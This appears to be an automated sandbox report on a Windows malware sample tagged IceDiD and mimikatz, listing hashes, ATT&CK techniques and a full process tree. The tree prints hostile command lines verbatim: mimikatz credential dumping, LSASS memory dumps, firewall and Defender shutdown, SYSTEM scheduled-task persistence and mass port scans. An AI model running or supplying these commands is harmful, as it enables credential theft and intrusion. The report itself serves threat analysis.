Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
13-08-2024 10:02
General
-
Target
2024-08-13_a218eecd93d1ef96794dc7d45bf39b6b_hacktools_icedid_mimikatz.exe
-
Size
8.9MB
-
MD5
a218eecd93d1ef96794dc7d45bf39b6b
-
SHA1
5e3d20916e23539fefef1d8f7443867dc49a5b73
-
SHA256
58c1c08db5945fb0798309be5c4db7c8493d28b0c07e57514d8fedacc1255351
-
SHA512
6ca57ebd7911eacb80be36b2b861c0ddd9a303441a85cc308f7d698ab987a80300ee719cff203bb5d5d5d5b9ceaf8ad94bb0430f02bffb5844e396245819b208
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (19492) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
-
Drops file in Drivers directory 2 IoCs
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Executes dropped EXE 30 IoCs
-
Loads dropped DLL 12 IoCs
-
UPX packed file 36 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
NSIS installer 3 IoCs
-
Modifies data under HKEY_USERS 47 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 25 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\ekleagute\pcgcfj.exe"C:\Windows\TEMP\ekleagute\pcgcfj.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\2024-08-13_a218eecd93d1ef96794dc7d45bf39b6b_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-08-13_a218eecd93d1ef96794dc7d45bf39b6b_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\bipepyze\sabzgqz.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\bipepyze\sabzgqz.exeC:\Windows\bipepyze\sabzgqz.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\bipepyze\sabzgqz.exeC:\Windows\bipepyze\sabzgqz.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tsmmkppcn\mbklagvue\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\tsmmkppcn\mbklagvue\wpcap.exeC:\Windows\tsmmkppcn\mbklagvue\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tsmmkppcn\mbklagvue\cibtlluza.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\tsmmkppcn\mbklagvue\Scant.txt2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\tsmmkppcn\mbklagvue\cibtlluza.exeC:\Windows\tsmmkppcn\mbklagvue\cibtlluza.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\tsmmkppcn\mbklagvue\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tsmmkppcn\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\tsmmkppcn\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
C:\Windows\tsmmkppcn\Corporate\vfshost.exeC:\Windows\tsmmkppcn\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tnfgntztu" /ru system /tr "cmd /c C:\Windows\ime\sabzgqz.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "tnfgntztu" /ru system /tr "cmd /c C:\Windows\ime\sabzgqz.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tibzeneva" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bipepyze\sabzgqz.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "tibzeneva" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bipepyze\sabzgqz.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "euztfpama" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ekleagute\pcgcfj.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "euztfpama" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ekleagute\pcgcfj.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 796 C:\Windows\TEMP\tsmmkppcn\796.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 64 C:\Windows\TEMP\tsmmkppcn\64.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 2320 C:\Windows\TEMP\tsmmkppcn\2320.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 2540 C:\Windows\TEMP\tsmmkppcn\2540.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 2656 C:\Windows\TEMP\tsmmkppcn\2656.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 2952 C:\Windows\TEMP\tsmmkppcn\2952.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 3144 C:\Windows\TEMP\tsmmkppcn\3144.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 3900 C:\Windows\TEMP\tsmmkppcn\3900.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 4048 C:\Windows\TEMP\tsmmkppcn\4048.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 960 C:\Windows\TEMP\tsmmkppcn\960.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 3032 C:\Windows\TEMP\tsmmkppcn\3032.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 1976 C:\Windows\TEMP\tsmmkppcn\1976.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 396 C:\Windows\TEMP\tsmmkppcn\396.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 3360 C:\Windows\TEMP\tsmmkppcn\3360.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 4556 C:\Windows\TEMP\tsmmkppcn\4556.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 4552 C:\Windows\TEMP\tsmmkppcn\4552.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 1844 C:\Windows\TEMP\tsmmkppcn\1844.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 2532 C:\Windows\TEMP\tsmmkppcn\2532.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 3268 C:\Windows\TEMP\tsmmkppcn\3268.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\tsmmkppcn\mbklagvue\scan.bat2⤵
-
C:\Windows\tsmmkppcn\mbklagvue\pejfeyype.exepejfeyype.exe TCP 194.110.0.1 194.110.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\bipepyze\sabzgqz.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\bipepyze\sabzgqz.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\sabzgqz.exe1⤵
-
C:\Windows\ime\sabzgqz.exeC:\Windows\ime\sabzgqz.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ekleagute\pcgcfj.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\ekleagute\pcgcfj.exe /p everyone:F2⤵
-
-
C:\Windows\SysWOW64\cuwouc.exeC:\Windows\SysWOW64\cuwouc.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\bipepyze\sabzgqz.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\bipepyze\sabzgqz.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\sabzgqz.exe1⤵
-
C:\Windows\ime\sabzgqz.exeC:\Windows\ime\sabzgqz.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ekleagute\pcgcfj.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\ekleagute\pcgcfj.exe /p everyone:F2⤵
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Discovery
Network Service Discovery
2Network Share Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
26.5MB
MD5b53d08557ab776f19e350d45d5f4f25f
SHA14c5d29a072dbcedf41fd849c6864a1e2d3fc37f7
SHA2560a8f481042f2518af6399d862635c5eb91e931c1b1262432d1b92e496d5bc000
SHA5121ff2361b9ed658c1fab4c739fef0dc2b950b605069540a977d86d7ee93102aeba56aac97887d73020c9f917cfca3eed06082eda3230ee1629921041891b152b1
-
Filesize
4.1MB
MD5d94e8569a8500d93ef3ab237dc84c6d9
SHA1f242551340456da8bcc89f596c043df47b36fe79
SHA25679e18f52f740372714624c165169670f76cafd776f252ce95ba14686cbe0c2a4
SHA5123e37617555c931f50f2dc5c33c4df8bf034087de269556376d35818fd59e9d2619669198ddfb3ada3eb2924c788fee7ca0f04309b184f3279a54a8c324389086
-
Filesize
3.8MB
MD5059feac89f7b168ad3537b24d10e506d
SHA15c11bf7115908d64dc585b8cbc31f4ac187ce484
SHA2567802835317bb4bb383fb40cb3bdf9b0ba60da653c560e88217301d40d0efea0f
